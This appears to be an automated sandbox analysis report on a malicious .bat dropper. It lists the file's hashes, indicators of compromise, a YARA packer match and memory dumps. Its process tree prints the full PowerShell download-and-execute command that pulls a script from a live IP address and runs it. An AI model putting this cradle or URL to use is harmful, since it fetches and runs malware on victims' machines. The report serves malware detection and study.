5f5d0072bf19dad6f7d88f7b7487e08d4a689d9b26d5cf265d54d049a1ae9788

Analysis

Target

9de315693c64bdae451a94b7fba94cd7.bat
Size

216B
MD5

326e8645188851fa741312cfd98964c4
SHA1

fc88590aa93e65b6d4604f18df31aeb7c78cffd4
SHA256

5f5d0072bf19dad6f7d88f7b7487e08d4a689d9b26d5cf265d54d049a1ae9788
SHA512

e3a8666cf03291ceeaae820553a8b10a474ec611503e7e89f21a4ecfdfb3233fa4c9908b6eb07bf0ecddd9e6785d5e2d74545faa5747a4ddda877484fa872e1f

Score

10^/10

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/9de315693c64bdae451a94b7fba94cd7

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

cmd.exe

description	pid	process	target process
PID 3892 wrote to memory of 3852	3892	cmd.exe	powershell.exe
PID 3892 wrote to memory of 3852	3892	cmd.exe	powershell.exe
PID 3892 wrote to memory of 3852	3892	cmd.exe	powershell.exe

Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

972 3852 WerFault.exe powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

WerFault.exe

description pid process

Token: SeRestorePrivilege 972 WerFault.exe
Token: SeBackupPrivilege 972 WerFault.exe
Token: SeDebugPrivilege 972 WerFault.exe

pid	pid_target	process	target process
972	3852	WerFault.exe	powershell.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

Processes:

WerFault.exe

ServiceHost packer 6 IoCs

Detects ServiceHost packer used for .NET malware

Processes:

resource	yara_rule
behavioral2/memory/3852-2-0x0000000000000000-mapping.dmp	servicehost
behavioral2/memory/3852-3-0x0000000000000000-mapping.dmp	servicehost
behavioral2/memory/3852-4-0x0000000000000000-mapping.dmp	servicehost
behavioral2/memory/3852-5-0x0000000000000000-mapping.dmp	servicehost
behavioral2/memory/3852-6-0x0000000000000000-mapping.dmp	servicehost
behavioral2/memory/3852-7-0x0000000000000000-mapping.dmp	servicehost

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9de315693c64bdae451a94b7fba94cd7.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3892

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/9de315693c64bdae451a94b7fba94cd7');Invoke-TRGIQEFKG;Start-Sleep -s 10000"
2⤵
PID:3852

memory/972-1-0x00000000048A0000-0x00000000048A1000-memory.dmp

Filesize
4KB

Download
memory/972-8-0x0000000004DD0000-0x0000000004DD1000-memory.dmp

Filesize
4KB

Download
memory/3852-0-0x0000000000000000-mapping.dmp

Download
memory/3852-2-0x0000000000000000-mapping.dmp

Download
memory/3852-3-0x0000000000000000-mapping.dmp

Download
memory/3852-4-0x0000000000000000-mapping.dmp

Download
memory/3852-5-0x0000000000000000-mapping.dmp

Download
memory/3852-6-0x0000000000000000-mapping.dmp

Download
memory/3852-7-0x0000000000000000-mapping.dmp

Download